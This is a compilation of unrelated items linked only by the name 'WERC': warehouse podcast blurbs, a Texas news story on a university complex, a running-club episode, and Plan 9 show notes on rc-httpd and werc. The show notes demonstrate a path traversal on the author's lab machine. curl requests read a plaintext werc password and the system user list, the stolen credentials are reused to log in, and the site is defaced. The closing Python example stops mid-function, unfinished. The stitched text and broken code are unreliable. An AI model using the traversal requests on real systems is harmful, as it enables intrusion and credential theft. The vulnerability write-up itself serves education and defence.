In this special episode of The New Warehouse Podcast, Kevin chats with Kristi Montgomery, VP of Innovation, Research, and Development at Kenco Logistics, and Mel Alwood, Regional VP of Operations at Neovia Logistics, to preview the upcoming WERC Conference taking place June 8–11, 2025, in New Orleans. Hosted by the Warehouse Education and Research Council (WERC), the conference centers on one powerful theme: Leading with Vision. Kristi and Mel share how this year's focus mirrors the realities of today's warehousing challenges and opportunities, including workforce transformation, AI, peer learning, and networking. Whether you're a first-time attendee or a longtime member, this conversation unpacks why the WERC 2025 Conference remains the go-to educational event for warehouse professionals.
EDINBURG, Texas - Raudel Garza, executive director of Edinburg Economic Development Corporation, says he expects great things from UT-Rio Grande Valley's highly anticipated Workforce Economy Research and Community (WERC) Complex. The complex sits next to I-69 Central in Edinburg. Back in the day it used to be the old Haggar Clothing Company building. Later it became UT-Pan American's Community Engagement and Student Services (CESS) office.

The WERC project came about thanks to a $2.4 million grant from the U.S. Economic Development Administration. The EDC grant will fund part of the $8.9 million project, with UTRGV providing an additional $6 million. The remaining $500,000 came from funds secured by U.S. Rep. Monica De La Cruz in this year's appropriations bill for the college.

“I think that (the WERC) is going to have a real big impact on business development and small business development in the near future for the entire region,” Garza said, in a recent interview with Ron Whitlock Reports. “They (UTRGV) are consolidating a lot of the business resources that they have now spread out in the (Edinburg) campus and other locations into this one facility.”

As the Rio Grande Guardian previously reported, construction has been master-planned and involves completely gutting and transforming the 126,000-square-foot building. “Of that space, approximately 15,000 square feet will be dedicated to classrooms; 10,000 square feet for a manufacturing incubator and commercialization activities; and 10,000 square feet to research and development laboratories specifying in manufacturing and prototyping,” the Guardian reported. “The complex will also include an environmentally controlled dry room, a high security area for government contract work, and office space for the Texas Manufacturing Assistance Center. The goal is to be a one-stop shop for businesses and students to research, design, and manufacture products – from start to finish – for market consumption.”

Raudel Garza told Ron Whitlock Reports that UTRGV has “a great support system” to help small businesses and businesses in general. “Ron Garza is going to be setting up quite a few exciting things out there, including, possibly, an incubator for advanced manufacturing, so companies that are (thinking of) coming into the Valley and trying to set up shop can get a lot of assistance from all the different organizations that are within the university, under one roof,” Raudel Garza told Ron Whitlock Reports. “And so I think it's going to be very good for the entire region, and it's great that it's in Edinburg.”

Ron Garza (no relation) is UTRGV's associate vice president for workforce and economic development. He is spearheading the project. Ron Garza previously told the Rio Grande Guardian: “What this does that's new and different is it takes all that service that we do and it's also going to add significant square footage for R&D [research and development] laboratories,” said Garza. “We have some on our campuses, but we don't have enough volume specifically for industry. We have a lot of industry partners … They're all asking for the physical space for research commercialization. This will be that space.”

Editor's Note: Ron Whitlock secured an interview with Raudel Garza following the recent Edinburg Commercial Tour. The Tour was co-sponsored by Edinburg EDC and the Rio Grande Valley Partnership. Go to www.riograndeguardian.com to read the latest border news stories and watch the latest news videos.
Join WERC leaders Arch Thomason and Will Sparks as they delve into the unique value of WERC membership for warehousing and distribution center professionals including the new team membership offerings and the added value they offer including the new Distribution Logistics Education Program.
"I call them my big dances." Natalie Pertz describes the running adventures - sometimes in the form of races, other times a bit broader than that definition - that she highlights each year on her calendar. The list is nothing short of epic, including the Chicago Marathon, the Javelina Jundred, setting a "Fastest Known Time" on the WO&D trail. (By the way, I did fact check. FastestKnownTime.com has been around longer than Strava.) Natalie is both earnest and funny talking about her running. She describes training for an ultra in the Southwest of the United States in a "suburban lawnmower hat." We discuss our childhood love for capture the flag. We discuss her experience growing up on a farm in Ohio and her first official 5K, the Run for Refugees in New Haven. And we talk about WERC, not to be confused with work. West End Run Club kicked off in 2021, and the Friday morning running, chatting, and coffee drinking crew has been a DC staple ever since. It's so welcoming that it has grown quite a bit! This episode was recorded in July, but I've been a bit slower with both recording and editing these days. Thank you for your patience - you know life (and another bout of marathon training) keeps you busy! Anyhow, thank you (and happy birthday) to a very kind and speedy community leader, Natalie Pertz!
This episode of the podcast is all about the power of vacuum lifts! Kevin was joined by Bob DeBusk, the North American sales director at PIAB Group at the WERC Conference to discuss their innovative vacuum technology and how it is being used in warehouse operations to make lifting effortless for employees. Brought to you by Big Joe Forklifts.
In this special episode of the New Warehouse Podcast, hosted by Kevin at the WERC 2024 conference in Dallas, we dive deep into the operations and innovations at Tractor Supply Company with guests Gabby Knoll, Manager of MHE and Automation Engineering, and Will Sparks, Director of Inventory Planning Systems and Analytics. These industry experts shed light on the unique challenges and advancements within the retail supply chain, particularly focusing on material handling, automation, and inventory management. Brought to you by Big Joe Forklifts.
Today, we're diving into a fascinating discussion from the New Warehouse Podcast, recorded live at the WERC 2024 conference in the vibrant city of Dallas, Texas. Kevin sat down with the dynamic Misbah Virani from Rapyuta Robotics, who handles partnerships in North America. Here's a rundown of their engaging conversation on Rapyuta Robotics' foray into the North American market and their innovative automation solutions.
In a special podcast episode recorded at WERC 2024 in Dallas, Texas, Kevin Lawton of The New Warehouse Podcast sits down with Uma Taylor, the Business Development Manager at Meiborg Inc., a prominent 3PL (Third Party Logistics provider). Uma shares her journey into logistics, details about Meiborg's growth, and provides crucial insights into custom bonded warehousing. This episode was brought to you by Big Joe Forklifts.
This special episode comes to you from this year's WERC Conference. This episode, sponsored by Big Joe Forklifts, dives into the latest trends and technologies in the material handling industry with Kevin being joined by Kurt Spyke, the Director of National Accounts at Big Joe Forklifts, to discuss the state of the industry, innovative solutions, and what lies ahead.
Our guest on this week's episode is Brett Wood, president and CEO of Toyota Material Handling North America. He also serves as the current chair of the Industrial Truck Association. Each year, the forklift industry sets apart a special day, known as National Forklift Safety Day, to recognize the importance of driver training and safe practices when operating industrial trucks. It's sponsored by the Industrial Truck Association. This year, National Forklift Safety Day will be held this coming Tuesday in Washington D.C. We talk with Wood about the event that is planned and how listeners can participate.

The Warehousing Education and Research Council (WERC) held its 47th Annual Conference in Dallas this week. The event drew about 500 attendees and was chock full of educational sessions covering technology, labor issues, and case studies about facility and operations improvement projects. There was also an update on the major trends and issues shaping the industry, including the release of the annual DC Metrics study.

In 2023, Flexport bought the digital technology of bankrupt Convoy, a digital freight matching company. Now we learn how Flexport intends to market that technology to help small carriers in managing their businesses.

Supply Chain Xchange also offers a podcast series called Supply Chain in the Fast Lane. It is co-produced with the Council of Supply Chain Management Professionals. Go to your favorite podcast platform to subscribe and to listen to past and future episodes.

Articles and resources mentioned in this episode:
- Industrial Truck Association - National Forklift Safety Day
- WERC releases 21st annual DC Measures report
- Flexport continues to invest in Convoy freight-matching technology
- Toyota Material Handling to build $100 million factory for electric forklifts

Send feedback about this podcast to podcast@agilebme.com
Podcast is sponsored by: Equipment Depot
Curious about the Warehouse Education and Research Council? Then this episode is for you! Kevin is joined by Jeremy Banta, Will Sparks and Melissa Alwood to talk all things WERC, including their upcoming conference June 2nd - 5th. If you want to network, learn from and get involved with other like-minded warehouse professionals then this is the organization and conference for you. Find out everything you need to know in this episode and for more information head here. We'll see you in Dallas in June!
Welcome to Life in the Leadership Lane where I am talking to leaders making a difference in the workplace and in our communities. How did they get to where they are and what are they doing to stay there! Buckle up and get ready to accelerate in the Leadership Lane! This week, I am talking with Tanya Mariottini, GMS-T, Director of Global Mobility at Twilio, and Board Member for WERC and Move for Hunger. How did Tanya get started in her career? What led her to the world of Mobility and Leadership? What does Tanya share about saying YES to move forward in her career? What does Tanya share about mentors that have inspired her journey? When did Tanya “find her lane” in her career? What does Tanya share about being different leading today than as a 26 year old? What does Tanya share about Leadership? What does Tanya share about WERC? What does Tanya share about Move For Hunger? What does Tanya share about significance? What advice does Tanya share to help us in our every day? …and more as we spend “Time to Accelerate” with a few more questions. Interview resources: Favorite quote(s) from Tanya: “I feel like I am a coach trying to bring out the best in everybody.” “There are two types of people; those that start out in a place of trust and those that need to earn it.” Connect with Tanya on LinkedIn Visit Twilio Learn more about WERC Learn more about Move for Hunger Learn more about the podcast host Bruce Waller Check out Bruce's books Drive With Purpose: Move Your Career from Success to Significance (#1 New Released book on Amazon) Life in the Leadership Lane; Moving Leaders to Inspire and Change the Workplace Find Your Lane; Change your GPS, Change your Career (“Book Authority” Best Books) Milemarkers; A 5 Year Journey …helping you record daily highlights to keep you on track. 
Subscribe to Bruce's Blog “Move to Inspire” Connect with Bruce on LinkedIn Connect with Bruce on Twitter Connect with Bruce on Instagram Connect with Bruce on Facebook Get relocation support for your next household goods or commercial office move across the US by reaching out to Bruce at bwaller@goarmstrong.com or visit The Armstrong Company
Welcome to Life in the Leadership Lane where I am talking to leaders making a difference in the workplace and in our communities. How did they get to where they are and what are they doing to stay there! Buckle up and get ready to accelerate in the Leadership Lane! How did Ashli get started in her career? What led her to the world of Leadership and Talent Mobility? What does Ashli share about mentors that have inspired her journey? When did Ashli “find her lane” in her career? What lessons does Ashli share about “curiosity”? What does Ashli share about “making mistakes”? What does Ashli share about WERC and what's ahead? What does Ashli share about hiring for Aptitude and Attitude? What “breaking news” does Ashli share on the podcast? What does Ashli share about the defining success”? What advice does Ashli share to help us in our every day? …and more as we spend “Time to Accelerate” with a few more questions. Interview resources: Favorite quote(s) from Ashli: “I'm really proud of my mistakes. If you don't make mistakes, then you're not really trying to grow.” You can teach technical knowledge to anyone that has aptitude and attitude when their heart is in the right place.” Connect with Ashli on LinkedIn Learn more about WERC Ashli's Book Recommendation Unreasonable Hospitality Check out Bruce's books Life in the Leadership Lane; Moving Leaders to Inspire and Change the Workplace Find Your Lane; Change your GPS, Change your Career (“Book Authority” Best Books) Milemarkers; A 5 Year Journey …helping you record daily highlights to keep you on track. 
Drive With Purpose: Move Your Career from Success to Significance *COMING February 2024 Subscribe to Bruce's Blog “Move to Inspire” Connect with Bruce on LinkedIn Connect with Bruce on Twitter Connect with Bruce on Instagram Connect with Bruce on Facebook Get relocation support for your next household goods or commercial office move across the US by reaching out to Bruce at bwaller@goarmstrong.com or visit The Armstrong Company
Jim Bierfeldt and Joe Lynch discuss what's inside the shipper mind. Jim is the Founder and President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth.

About Jim Bierfeldt
Jim Bierfeldt is the Founder and President of Logistics Marketing Advisors. Jim has had a 35-year career in marketing and communications, including 25+ within the logistics industry. He ran marketing for a large 3PL before launching his own marketing agency, Logistics Marketing Advisors, which focuses exclusively on providing marketing strategy and services to logistics businesses. His expertise includes strategic planning, brand positioning, advertising, public relations, website strategy and design, and development of white papers, case studies and other content. Jim has worked with both smaller, regional logistics companies and multi-billion dollar global firms, all of whom benefit from his unique combination of marketing expertise and logistics industry knowledge. Jim holds a Masters Degree in Communications from Fordham University and has been active in CSCMP, WERC and the IWLA. His hobbies include running (including multiple marathons).

About Logistics Marketing Advisors
Logistics Marketing Advisors (LMA) is a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth.
Our niche focus gives us the industry understanding and contacts required to market effectively to logistics decision makers. We're a HubSpot-certified, inbound marketing agency with the following specialties: branding and positioning strategy, lead generation, web design and development, content marketing, public relations, and creation of branded and educational content like videos, case studies, white papers and other sales support materials. LMA's approach recognizes that logistics services today are BOUGHT, not sold. Marketing tactics that interrupt and annoy busy logistics executives get ignored. These buyers now have access to a wealth of information and do their own research on how to solve supply chain problems, and what providers can do to help. At LMA, we help logistics businesses get found by prospects during this research phase. Instead of building a marketing engine to solicit, we build an engine that naturally attracts the best prospects. The best way to do that is with helpful, provocative content that leads prospects to conclude, for themselves, that your company has the best solution for their specific challenge. Key Takeaways: Inside the Shipper Mind Jim Bierfeldt is the President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. Logistics Marketing Advisors is a boutique marketing and public relations agency specializing in the logistics and transportation industry. They offer a wide range of services, including strategic planning, branding, content creation, social media marketing, public relations, and event management. Their team of experienced professionals has a deep understanding of the logistics industry and the unique challenges and opportunities it faces. They are committed to helping their clients achieve their marketing and business goals through creative and effective solutions. 
Some of their notable clients include third-party logistics providers, freight forwarders, trucking companies, and technology companies serving the logistics industry. They have been featured in leading industry publications such as Logistics Management, Supply Chain Management Review, and FreightWaves. They are members of the Council of Supply Chain Management Professionals (CSCMP) and the American Marketing Association (AMA). They are passionate about helping their clients succeed and are committed to providing them with the highest level of service and support. Learn More About Inside the Shipper Mind Jim's LinkedIn Logistics Marketing Advisors (LMA) LinkedIn Logistics Marketing Advisors (LMA) 2022 Survey Results: Buyers of Logistics Services Provide Advice on How to Get Their Attention Episode Sponsor: Wreaths Across America Wreaths Across America Radio - Wreaths Across America Episode Sponsor: Lean Solutions Group Outsourced Sales and Marketing with Ryan Mann The Logistics of Logistics Podcast If you enjoy the podcast, please leave a positive review, subscribe, and share it with your friends and colleagues. The Logistics of Logistics Podcast: Google, Apple, Castbox, Spotify, Stitcher, PlayerFM, Tunein, Podbean, Owltail, Libsyn, Overcast Check out The Logistics of Logistics on Youtube
In the latest episode, recorded at the Warehousing Education and Research Council (WERC) Conference 2023, we had the privilege of sitting down with Michael Mikitka, a representative from WERC. As an organization focused on the warehousing industry, WERC plays a crucial role in providing education, research, and support to professionals in this sector.
Our guest on this week's episode is Dr. Stefan Heck, CEO and founder of Nauto, a technology company that improves safety for fleet drivers. June is National Safety Month. Drivers on our nation's roads have less than two seconds to react to most situations that can result in an accident, injury, or even death. But there are technologies available that incorporate artificial intelligence to help assure safety on our roadways. Our guest shares how these new technologies alert commercial drivers to unsafe conditions before they happen.

We have seen the rise of manufacturing here in the U.S. as many companies are bringing their production back from Asia to North America. New research this week reveals how manufacturers are feeling about the current conditions for reshoring.

The newest DC Measures study is out. Produced by WERC in conjunction with DC Velocity, the research tracks the latest developments in distribution strategies and operational metrics. This allows companies to benchmark the performance of their warehouses as well as to track industry trends.

DC Velocity's sister publication CSCMP's Supply Chain Quarterly offers a podcast series called Supply Chain in the Fast Lane. It is co-produced with the Council of Supply Chain Management Professionals. A new eight-part series on Transportation Tech has launched. Go to your favorite podcast platform to subscribe and to listen to past and future episodes.

Articles and resources mentioned in this episode:
- Nauto
- Manufacturing firms complain about interest rates, economic conditions, and the talent shortage
- WERC releases the 2023 DC Measures report

Send feedback about this podcast to podcast@dcvelocity.com
Podcast is sponsored by: PERC: The Propane Research Council
Tina from Huntsville calls in WERC to discuss how the Trump indictment is just a distraction to all the other real issues in America right now.
Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models

Installing Plan 9 with libvirt

    [root@localhost]# virt-install -n 9pwn --description "pre-patched rc-httpd" --osinfo=unknown --memory=4096 --vcpus=4 --disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 --graphics spice --cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso --network bridge=virbr0
    [root@localhost]# virt-viewer 9pwn

How I find the IP of my guests and add it to my /etc/hosts for faster access.

    [root@localhost]# virsh domiflist 9pwn
     Interface   Type     Source   Model   MAC
    ----------------------------------------------------------
     vnet3       bridge   virbr0   e1000   52:54:00:43:8a:50
    [root@localhost]# arp -e | grep 52:54:00:43:8a:50
    192.168.122.20   ether   52:54:00:43:8a:50   C   virbr0
    [root@localhost]# echo 192.168.122.20 cirno >> /etc/hosts

Proceed as normal with a 9 installation.

Set up CPU server with rc-httpd and werc

I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine). I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less-broken. I may or may not update them.

I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting.

Configuring a CPU server

Add users to file server

Connect to the file server and add a new user called who is in the groups sys, adm, and upas

    term% con -C /srv/cwfs.cmd
    newuser
    newuser sys +
    newuser adm +
    newuser upas +

Reboot and set user= when prompted at boot time.

Configure user's environment

This is similar to cp -r /etc/skel /home/ on a UNIX system.
    /sys/lib/newuser

Configure headless booting

Mount the boot partition:

    term% 9fs 9fat

Edit the boot config, /n/9fat/plan9.ini:

    bootfile=9pc64
    nobootprompt=local!/dev/sdC0/fscache
    mouseport=ps2
    monitor=vesa
    vgasize=1024x768x14
    user=
    tiltscreen=none
    service=cpu

Add hostowner info to nvram

Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner. For automatic booting (aka not entering a password at the physical machine every time we power it on), we need to add the hostowner's key to nvram.

    term% nvram=/dev/sdF0/nvram auth/wrkey
    bad nvram des key
    bad authentication id
    bad authentication domain
    authid:
    authdom: cirno
    secstore key:
    password:

Configure auth server

In order to connect to the system over the network, the new user must be added to the auth server.

    term% auth/keyfs
    term% auth/changeuser
    Password:
    Confirm password:
    Assign new Inferno/POP secret? [y/n]: n
    Expiration date (YYYYMMDD or never) [never]: never
    Post id:
    User's full name:
    Department #:
    User's email address:
    Sponsor's email address:
    user installed for Plan 9

Configure permissions

/lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares).

Append to /lib/ndb/auth:

    hostid= uid=!sys uid=!adm uid=*

Then reboot.

Test if it worked with drawterm

The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won't work.

    $ /opt/drawterm -u -h example.com -a example.com -r ~/

Configure rc-httpd

Edit /rc/bin/rc-httpd/select-handler. This file is something like /etc/httpd.conf on a UNIX system.
    #!/bin/rc
    PATH_INFO=$location
    switch($SERVER_NAME) {
    case example.com
        FS_ROOT=/sys/www/$SERVER_NAME
        exec static-or-index
    case *
        error 503
    }

To listen on port 80 and run the handler on port 80:

    cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80
    cpu% chmod +x /rc/bin/rc-httpd/select-handler

Reboot and test.

SSL

I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs.

Generate and install:

    cpu% ramfs -p
    cpu% cd /tmp
    cpu% auth/rsagen -t 'service=tls role=client owner=*' > key
    cpu% chmod 600 key
    cpu% cp key /sys/lib/tls/key
    cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert
    cpu% mkdir /cfg/$sysname
    cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart

Now add a listener in /rc/bin/service/tcp443:

    #!/bin/rc
    exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $*

And make it executable:

    cpu% chmod +x /rc/bin/service/tcp443

Install and configure werc

    cpu% cd
    cpu% mkdir /sys/www && cd /sys/www
    cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz > werc-1.5.0.tgz
    cpu% tar xzf werc-1.5.0.tgz
    cpu% mv werc-1.5.0 werc
    # ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK
    # EG. DIRDIR, BLAGH, ETC
    # DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK
    # HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK
    # PLEASE I BEG YOU
    cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i
    cpu% cd www/werc/sites/
    cpu% mkdir example.com
    cpu% mv default.cat-v.org example.com

Now re-edit /rc/bin/rc-httpd/select-handler:

    #!/bin/rc
    WERC=/sys/www/werc
    PLAN9=/
    PATH_INFO=$location
    switch($SERVER_NAME){
    case cirno
        FS_ROOT=$WERC/sites/$SERVER_NAME
        exec static-or-cgi $WERC/bin/werc.rc
    case *
        error 503
    }

Test the website. Werc is fiddly. Werc is archaic. Werc is fun.
Path traversal vulnerabilities in old versions of rc-httpd

Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases.

The vulnerability

    # get list of werc admin users
    [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members
    pwn
    # get that werc user's password
    [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/pwn/password
    supersecret

Wait, the passwords for werc are stored in plain text? Let's log in.

    [root@localhost]# firefox http://cirno/_users/login

Now let's see if any of the werc users are also system users:

    # let's enumerate users
    [root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users
    -1:adm:adm:glenda,pwn
    0:none::
    1:tor:tor:
    2:glenda:glenda:
    3:pwn:pwn:
    10000:sys::glenda,pwn
    10001:map:map:
    10002:doc::
    10003:upas:upas:glenda,pwn
    10004:font::
    10005:bootes:bootes:

Let's hope that no one is re-using credentials. Let's check just to be sure.

    $ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G
    cpu% cat /env/sysname
    cirno
    cpu%

This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords.

How the static-or-cgi handler works

rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script. I will compile these archaic rc scripts into pseudo code for the listener.

The static-or-cgi handler (the handler specified in the httpd config) is simple:

    #!/bin/rc
    cgiargs=$*
    fn error{
        if(~ $1 404)
            exec cgi $cgiargs
        if not
            $rc_httpd_dir/handlers/error $1
    }
    if(~ $location */)
        exec cgi $cgiargs
    if not
        exec serve-static

If the requested file exists, call the cgi handler and pass it arguments. If the requested file does not exist, call the serve-static handler.
How the serve-static handler works

The problem lies in the serve-static handler:

    #!/bin/rc
    full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}
    full_path=$"full_path
    if(~ $full_path */)
        error 503
    if(test -d $full_path){
        redirect perm $"location^'/' 'URL not quite right, and browser did not accept redirect.'
        exit
    }
    if(! test -e $full_path){
        error 404
        exit
    }
    if(! test -r $full_path){
        error 503
        exit
    }
    do_log 200
    switch($full_path){
    case *.html *.htm
        type=text/html
    case *.css
        type=text/css
    case *.txt *.md
        type=text/plain
    case *.jpg *.jpeg
        type=image/jpeg
    case *.gif
        type=image/gif
    case *.png
        type=image/png
    case *
        type=`{file -m $full_path}
    }
    if(~ $type text/*)
        type=$type^'; charset=utf-8'
    max_age=3600    # 1 hour
    echo 'HTTP/1.1 200 OK'^$cr
    emit_extra_headers
    echo 'Content-type: '^$type^$cr
    echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr
    echo 'Cache-control: max-age='^$max_age^$cr
    echo $cr
    exec cat $full_path

- encode the full file path into a url
- if the url points to a file outside of '*/', the document root, error 503
- if the url is broken, exit
- if the url points to a file that neither exists nor is readable, error 503
- if you haven't exited by now, serve the file

The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING. The urlencode command works by decoding encoded characters.

    cpu% echo 'http://cirno/..%2f' | urlencode -d
    http://cirno/../

Does ../ exist in */ ? The answer is yes. .. is a directory contained inside of */ and */../ is the current working directory.

How they fixed it

Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided.

Other (optional) bad config options in werc

rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability.
Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd, to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever. I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser.

Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled.

    # get config
    [root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config
    masterSite=cirno
    siteTitle='Werc Test Suite'
    conf_enable_wiki
    wiki_editor_groups admin

Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability.

    [root@localhost]# curl -s cirno | pandoc --from html --to plain
    quotes | docs | repo | golang | sam | man | acme | Glenda | 9times | harmful | 9P | cat-v.org

    Related sites: | site updates | site map |

    Werc Test Suite

    - › apps/
    - › titles/

    SECURITY ADVISORY:

    lol this guy still hasn't figured out the ..%2f trick

    Powered by werc

Modifying werc to support password hashing

Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc

    % echo 'supersecret' | sha1sum -2 512

Private namespaces to the rescue

Luckily enough, the webserver runs as the none user with its own namespace.

Comparing the hostowner's namespace and none user's namespace

I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences.

    cpu% ns | sort > cpu.ns
    cpu% ps -a | grep -e 'listen.*80' | grep -v grep
    none 355 0:00 0:00 132K Open listen [/net/tcp/2 tcp!*!80]
    cpu% ns 355 | sort > listen.ns
    cpu% diff -u listen.ns cpu.ns
    --- listen.ns
    +++ cpu.ns
    @@ -6,17 +6,29 @@
     bind /amd64/bin /bin
     bind /mnt /mnt
     bind /mnt/exportfs /mnt/exportfs
    +bind /mnt/temp/factotum /mnt/factotum
     bind /n /n
     bind /net /net
     bind /root /root
    +bind -a '#$' /dev
     bind -a '#I' /net
    +bind -a '#P' /dev
    +bind -a '#S' /dev
     bind -a '#l' /net
    +bind -a '#r' /dev
    +bind -a '#t' /dev
    +bind -a '#u' /dev
    +bind -a '#u' /dev
     bind -a '#¤' /dev
     bind -a '#¶' /dev
    +bind -a '#σ/usb' /dev
    +bind -a '#σ/usbnet' /net
     bind -a /rc/bin /bin
     bind -a /root /
    +bind -b '#k' /dev
     bind -c '#e' /env
     bind -c '#s' /srv
    +bind -c /usr/pwn/tmp /tmp
     cd /usr/pwn
     mount -C '#s/boot' /n/other other
     mount -a '#s/boot' /
    @@ -26,4 +38,4 @@
     mount -a '#s/slashmnt' /mnt
     mount -a '#s/slashn' /n
     mount -aC '#s/boot' /root
    -mount -b '#s/factotum' /mnt
    +mount -b '#s/cons' /dev

The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace:

    '#$' PCI interfaces
    '#P' APM power management
    '#S' storage devices
    '#r' realtime clock and nvram
    '#t' serial ports
    '#u' USB
    '#σ' /shr global mountpoints
    '#k' keyboard
    /tmp directories
    '#s' various special files relating to services

The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none.

Closing

An argument could be made that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system". I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system.

For example, when I write PHP applications, I consider things in this order:

- don't pass unnecessary resources into the document root via symlinks, bind mounts, etc.
- never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes
- sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements.
- fire up a kali linux vm and beat the test server half to death
- iterate upon my ignorance
- doubly verify DAC just to be sure
- re-check daemon configs to make sure I'm not doing anything stupid
- FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed

And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc.

Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks.

Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system.

Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system or otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system? Plan 9 is perfect for this type of research.

I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape.

I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad.

And my final thought:

    Criticism: This program/OS/whatever sucks
    Response: I know, help me fix it.
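
The ordering problem described in the serve-static section above, as an added Python example (not rc-httpd's code and not the project's actual fix): it decodes the request once, normalises it, and refuses anything that leaves the document root. FS_ROOT, the function names and the sample requests are assumptions made for illustration; the check is lexical only and does not account for binds or symlinks.

```python
"""Decode-then-confine path check for a static file handler (added example)."""
import posixpath
from urllib.parse import unquote

# Assumption: a hypothetical document root; the page only shows /sys/www.
FS_ROOT = "/sys/www/werc/sites/cirno"


def resolve_unchecked(fs_root, path_info):
    """Same order of operations as the old handler: join, decode, use.

    normpath() stands in for the kernel walking the '..' elements, so the
    return value is the file that would actually be opened.
    """
    return posixpath.normpath(unquote(fs_root + path_info))


def resolve_confined(fs_root, path_info):
    """Return the path to serve, or None if the request must be refused."""
    decoded = unquote(path_info)
    # A NUL byte or a second layer of percent-encoding has no business in a
    # static file name; refuse instead of decoding again.
    if "\x00" in decoded or unquote(decoded) != decoded:
        return None
    root = posixpath.normpath(fs_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare on a path-element boundary: a bare startswith(root) would also
    # accept a sibling directory such as "<root>-private".
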